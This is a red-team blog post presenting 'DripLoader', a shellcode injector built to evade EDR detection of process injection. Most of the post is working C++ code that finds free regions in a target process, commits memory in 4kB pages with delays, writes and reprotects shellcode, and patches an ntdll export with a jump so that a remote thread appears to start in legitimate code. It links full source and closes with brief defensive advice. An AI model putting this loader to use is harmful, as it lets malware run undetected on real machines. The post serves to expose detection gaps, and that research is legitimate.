Bypassing EDR Real-Time Injection Detection Logic

By Filip Olszak

This post is not about suppressing event collection, but about discovering EDR architecture limitations in the context of process injection.

Some great posts on bypassing EDR agent collection:

Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank)
A tale of EDR bypass methods (@s3cur3th1ssh1t)
FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec)
Hell's Gate (@smelly__vx, @am0nsec)
Halo's Gate - twin sister of Hell's Gate (sektor7)
Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog)
Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)

Introduction

In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from user mode. Most notably, Microsoft uses ETW for this, though there are vendors who do it better.

Today I want to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting; combined, the two give us a technique undetectable by MDATP and many other EDRs out there, as of today.

It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage.

Check out my previous post on detecting process injection with kernel ETW.

T1055 vs EDR

Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass.

It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed.

Other than that, the value of the last evaluation in the context of injections is very limited. We are not getting the full picture of how much each vendor invests into researching TTPs relevant right now and in the future, or of how robust the detection capability and data sources really are.

While some EDRs were not able to flag on the elementary techniques, many improved detection capabilities to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments, they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance.

We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine.

Let's first discuss all the detection opportunities for anomalous remote thread creation.

CRT anomalies

The API getting the most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel-mode target intercepted through kernel callbacks.

Here we have a basic detection for a specific Windows process - msbuild.exe creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments.

Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity while keeping noise down to allow their analysts to review and classify the important stuff.

A more generic, custom MDATP thread creation rule, based around the new FileProfile() enrichment function, detects extremely rare files creating threads in remote processes. It is very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain.

As an example, Defender logs most remote thread creations as labeled events, but low file prevalence alone is not a good enough indicator to trigger an alert, and there is more advanced logic in play. The same is true for most decent EDRs.

Understanding correlation

By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.

(I also assume the platform is not incredibly noisy, to the level of it being unusable)

This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.

On-agent detections, activity, and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties.

We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.
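To make the role of time in correlation concrete, here is a minimal sketch of a purely time-based correlator as a defender might reason about it. The `Event` record, its field names, and the window size are hypothetical and do not describe any vendor's implementation; the point is only that an event outside the window is never attached to the alert.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified telemetry record; field names are illustrative.
struct Event {
    uint64_t    timeMs;  // time the event was observed on the host
    std::string label;   // e.g. "VM_ALLOC", "VM_WRITE", "THREAD_START"
};

// Returns the events a purely time-based correlator would attach to an
// alert raised at alertTimeMs, using a symmetric window of windowMs.
std::vector<Event> correlate(const std::vector<Event>& events,
                             uint64_t alertTimeMs,
                             uint64_t windowMs)
{
    std::vector<Event> linked;
    for (const Event& e : events) {
        // Absolute distance in time between the event and the alert.
        const uint64_t delta = e.timeMs > alertTimeMs
                                   ? e.timeMs - alertTimeMs
                                   : alertTimeMs - e.timeMs;
        if (delta <= windowMs)
            linked.push_back(e);
    }
    return linked;
}
```

With a 60-second window, two events recorded one second apart are linked to the same alert, while an event recorded fifteen minutes later is not. Real platforms combine time with other context, so this is a lower bound on what a correlator can do rather than a model of one.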

For the same reason, choosing your EDR vendor based on numerical results such as the MITRE evaluation's percentage of coverage is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means that time correlation of labeled events from the host to a single alert is good enough to score 100% coverage.

High fidelity alerts

So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.

For thread creation, the most common constraint is a thread starting process ≠ hosting process - so monitoring only remote thread creation, usually also limited to those with:

thread start address in a committed (MEM_COMMIT) segment that is not backed by an image
the size of segment being larger than X

At scale this will still generate a very significant number of false positives, which may lead to further filtering, for example:

thread location (target) only in Windows built-in executables
- only a subset of these
thread initiator (source) only in risky executables
- unknown hashes
- low file prevalence
- risky paths (%userprofile%, %temp% etc.)
- not seen on the network/on the host
memory page contains suspicious stuff

Machine learning models are often employed to attempt to solve this issue. These assumptions will differ between vendors, but the idea is always to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection.
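The filtering described above can be pictured as a chain of predicates over a thread-creation event. The sketch below is an illustration only: the `ThreadStartEvent` structure, its fields, and the `kMinRegionSize` threshold are assumptions made for this example, and real products use different and richer criteria.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical thread-creation event; field names are illustrative only.
struct ThreadStartEvent {
    uint32_t sourcePid;             // process that created the thread
    uint32_t targetPid;             // process hosting the thread
    bool     startInImage;          // start address lies in a MEM_IMAGE region
    uint64_t regionSize;            // size of the region holding the start address
    bool     sourceLowPrevalence;   // initiator is a rarely seen file
    bool     targetIsWindowsBinary; // target is a Windows built-in executable
};

// The "X" size threshold from the list above; the value is arbitrary here.
constexpr uint64_t kMinRegionSize = 0x10000;

// Returns true only for events that survive every filter in the chain.
bool isHighFidelityCandidate(const ThreadStartEvent& e)
{
    if (e.sourcePid == e.targetPid) return false;        // local thread creation
    if (e.startInImage) return false;                    // image-backed start address
    if (e.regionSize <= kMinRegionSize) return false;    // segment not larger than X
    return e.sourceLowPrevalence && e.targetIsWindowsBinary;
}
```

Every additional predicate removes false positives, but it also defines a class of events that will never alert on their own, for example any remote thread whose start address is image-backed.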

While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, how it's created is often unexpected and makes monitoring infeasible, thus relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks nowadays is an easily exploitable design flaw.

SetThreadContext

In case of process hollowing or thread hijacking our target thread has already been created legitimately by the Windows Loader or target application locally, and thus there is nothing to detect upon. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process.

Once we have the telemetry, at scale it is much easier to detect certain SetThreadContext anomalies than CRT injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops.

QueueUserAPC

Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and executed once it enters an alertable state.

In recent years userland hooking evasion has been getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process before the ntdll!LdrpInitializeProcess function has had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process.

Once again this technique becomes easy to detect when we stop relying solely on hooking.

DripLoader

DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.
The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent inventories in EDR.

DripLoader evades EDRs by
using the most risky APIs possible like NtAllocateVirtualMemory and NtCreateThreadEx
blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
avoiding multi-event correlation by introducing delays

Allocating memory

To bypass any memory allocation-based logic we will only commit memory at page granularity, in PageSize-sized chunks, which on Windows 10 with a modern processor is 4kB:

this constant found in the SYSTEM_INFO structure tells us the lowest possible size of a VM allocation
since most legitimate remote VM operations work on a single, or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on

To accomplish this we need to deal with some inconveniences

we need our shellcode in memory as a contiguous byte sequence, which means we cannot let kernel32!VirtualAllocEx choose the base, as it might reserve memory at an address where the other allocations will not fit
in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity which is another constant found in SYSTEM_INFO and is usually 64kB
- for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 64kB range up to 0x40010000 will be unavailable for new allocations
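The rounding behaviour described above is plain arithmetic and can be checked without touching the Windows API. The sketch below hard-codes 4kB and 64kB as assumptions; on a real system both values should be read from SYSTEM_INFO (dwPageSize and dwAllocationGranularity) rather than assumed. The function names are made up for this example.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kPageSize  = 0x1000;   // 4kB, assumed; see SYSTEM_INFO.dwPageSize
constexpr uint64_t kAllocGran = 0x10000;  // 64kB, assumed; see SYSTEM_INFO.dwAllocationGranularity

// Round value up to the next multiple of alignment (a power of two).
constexpr uint64_t alignUp(uint64_t value, uint64_t alignment)
{
    return (value + alignment - 1) & ~(alignment - 1);
}

// Lowest base address usable by a *new* reservation placed after an
// existing reservation of `size` bytes that starts at `base`.
uint64_t nextReservationBase(uint64_t base, uint64_t size)
{
    assert(base % kAllocGran == 0);  // new reservations start on a granularity boundary
    return alignUp(base + size, kAllocGran);
}

// Number of page-sized commits that fit in one granularity-sized reservation.
constexpr uint64_t pagesPerReservation()
{
    return kAllocGran / kPageSize;
}
```

For the example in the text, `nextReservationBase(0x40000000, 0x1000)` evaluates to 0x40010000, and `pagesPerReservation()` is 16, which is why one 64kB reservation can later be committed in sixteen separate 4kB steps.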

Steps we take

pre-define a list of 64-bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob

const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
                                         (void*)0x0000000010000000,
                                         (void*)0x0000000021000000,
                                         (void*)0x0000000032000000,
                                         (void*)0x0000000043000000,
                                         (void*)0x0000000050000000,
                                         (void*)0x0000000041000000,
                                         (void*)0x0000000042000000,
                                         (void*)0x0000000040000000,
                                         (void*)0x0000000022000000 };
                                       
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
    MEMORY_BASIC_INFORMATION mbi;

    for (auto base : VC_PREF_BASES) {
        VirtualQueryEx(
            hProc,
            base,
            &mbi,
            sizeof(MEMORY_BASIC_INFORMATION)
        );

        if (MEM_FREE == mbi.State) {
            uint64_t i;
            for (i = 0; i < cVmResv; ++i) {
                LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                VirtualQueryEx(
                    hProc,
                    currentBase,
                    &mbi,
                    sizeof(MEMORY_BASIC_INFORMATION)
                );
                if (MEM_FREE != mbi.State)
                    break;
            }
            if (i == cVmResv) {
                // found suitable base
                return base;
            }
        }
    }
    return nullptr;
}

reserve required number of full AllocationGranularity (64kB) sized regions, and then loop over those committing 4kB pages to ensure page alignment

// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i) 
{
    // sleeps here
    ANtAVM(
        hProc,
        &currentVmBase,
        NULL, 
        &szVmResv,
        MEM_RESERVE, 
        PAGE_NOACCESS
    );

    if (STATUS_SUCCESS == status)
        vcVmResv.push_back(currentVmBase);
    else
        return 4;

    currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}

// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i) 
{
    for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) 
    {
        DWORD offset = (cmm_i * szVmCmm);
        currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);

        ANtAVM(
            hProc, 
            &currentVmBase, 
            NULL, 
            &szVmCmm, 
            MEM_COMMIT, 
            PAGE_READWRITE
        );
        
        // sleeps here
        
        SIZE_T szWritten{ 0 };
        ANtWVM(
            hProc, 
            currentVmBase, 
            &shellcode[offsetSc], 
            szVmCmm, 
            &szWritten
        );

        offsetSc += szVmCmm;
        
        // sleeps here

        ANtPVM(
            hProc, 
            &currentVmBase, 
            &szVmCmm, 
            PAGE_EXECUTE_READ, 
            &oldProt
        );
    } 
}

The pages are also written to and individually reprotected with each run to avoid a large RegionSize of a target memory page in properties of logged VirtualProtectEx events. (TiEtw provides this, and hooks can too).

Creating the thread

Now that we have our shellcode in the remote process we need to initiate its execution.

To do this we will use the NtCreateThreadEx native API, which is the ntdll target of CRT and hence very commonly called by legitimate software. To bypass any detections we will:

create the new thread from MEM_IMAGE base address
- moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll
the location will be patched with a far jmp to our shellcode base at the time of thread creation

Note that we do not need to run in a MEM_IMAGE segment, as we only care about logging arguments in the TiEtw/Hook event.

If our shellcode creates a new thread (which would happen for example when using sRDI beacon.dll), the locally created thread won't be flagged by most EDRs, but it will no longer have ntdll as its start address, which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread.
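From the defender's side, a patched export in a known-good module is something memory scanning can catch, since the bytes in memory no longer match the module on disk. The sketch below shows only the comparison step and works on two byte buffers; how those buffers are obtained, and how legitimate differences such as relocations or vendor hooks are excluded, is left out and would have to be handled in a real scanner. The function name is hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns the offsets at which the in-memory bytes differ from the
// reference bytes (for example, the same code range read from disk).
// Only the overlapping prefix of the two buffers is compared.
std::vector<size_t> findModifiedOffsets(const std::vector<uint8_t>& reference,
                                        const std::vector<uint8_t>& inMemory)
{
    std::vector<size_t> diffs;
    const size_t n = reference.size() < inMemory.size() ? reference.size()
                                                        : inMemory.size();
    for (size_t i = 0; i < n; ++i) {
        if (reference[i] != inMemory[i])
            diffs.push_back(i);
    }
    return diffs;
}
```

A non-empty result for the first bytes of an exported function that is also the start address of a remotely created thread would be a strong signal, which is the kind of memory scanning this project argues event-driven detection needs to be paired with.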

Steps we take

figure out RVA of the function we will hijack

// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };

LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
    unsigned char* b = (unsigned char*)&vm_base;

    unsigned char jmpSc[7]{
        0xB8, b[0], b[1], b[2], b[3],
        0xFF, 0xE0
    };

    // find the export EP offset
    HMODULE hJmpMod = LoadLibraryExA(
        jmpModName,
        NULL,
        DONT_RESOLVE_DLL_REFERENCES
    );

    if (!hJmpMod)
        return nullptr;

    LPVOID  lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);

    DWORD   offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
    
[...]
}

find the base of remote ntdll and calculate AVA

[...]

    LPVOID  lpRemFuncEP{ 0 };

    HMODULE hMods[1024];
    DWORD   cbNeeded;
    char    szModName[MAX_PATH];
    
    if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
    {
        int i;
        for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
        {
            if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
            {
                if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
                    lpRemFuncEP = hMods[i];
                    break;
                }
            }
        }
    }

    lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
    
[...]

overwrite the function prologue with a jmp

[...]

    if (NULL == lpRemFuncEP)
        return nullptr;

    SIZE_T szWritten{ 0 };
    WriteProcessMemory(
        hProc,
        lpDllExport,
        jmpSc,
        sizeof(jmpSc),
        &szWritten
    );

    return lpDllExport;
}

CreateRemoteThread

The full source and more explanations can be found on GitHub

GitHub - xuanxuan0/DripLoader: Evasive shellcode loader for bypassing event-based injection detection (PoC)

Result

1. The activity will generate events with the following characteristics

// reservations
VM_ALLOC:
      REMOTE: 1,
      SIZE: 0x10000,
      TYPE: 0x2000,
      PROT: 0x01 (-)


// commits 
VM_ALLOC:
      REMOTE: 1,
      SIZE: 0x1000,
      TYPE: 0x1000,
      PROT: 0x04 (rw)
      
      
VM_WRITE:
      REMOTE: 1,
      SIZE: 0x1000
      
      
THREAD_START:
      REMOTE: 1,
      SUSPENDED: 0,
      ACCMSK: 0xFFFF (full),
      PAGE_TYPE: 0x1000000 (img),
      LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0

2. State of the target process (assuming shellcode does not create thread)

Defense recommendations

Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team
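As a rough illustration of the aggregation idea, the sketch below groups remote allocation events by source and target process and sums them, so that many individually unremarkable 4kB commits become visible as one total. The `VmAllocEvent` structure and its fields are hypothetical; in practice this would be a hunting query over whatever schema your EDR exposes, not C++ code.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <utility>
#include <vector>

// Hypothetical remote-allocation event; field names are illustrative.
struct VmAllocEvent {
    uint32_t sourcePid;  // process performing the allocation
    uint32_t targetPid;  // process receiving the allocation
    uint64_t size;       // allocation size in bytes
};

struct PairStats {
    uint64_t count = 0;       // number of remote allocations seen
    uint64_t totalBytes = 0;  // sum of their sizes
};

using PairKey = std::pair<uint32_t, uint32_t>;  // (sourcePid, targetPid)

// Aggregates remote allocations per (source, target) pair; local
// allocations are ignored.
std::map<PairKey, PairStats> aggregate(const std::vector<VmAllocEvent>& events)
{
    std::map<PairKey, PairStats> stats;
    for (const VmAllocEvent& e : events) {
        if (e.sourcePid == e.targetPid)
            continue;
        PairStats& s = stats[PairKey(e.sourcePid, e.targetPid)];
        s.count += 1;
        s.totalBytes += e.size;
    }
    return stats;
}
```

Thirty-two 4kB commits from one process into another add up to 0x20000 bytes for that pair, a total that a per-event size threshold would never see. Sorting the resulting pairs by how rarely they occur across the fleet is one way to apply least frequency analysis on top of this.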
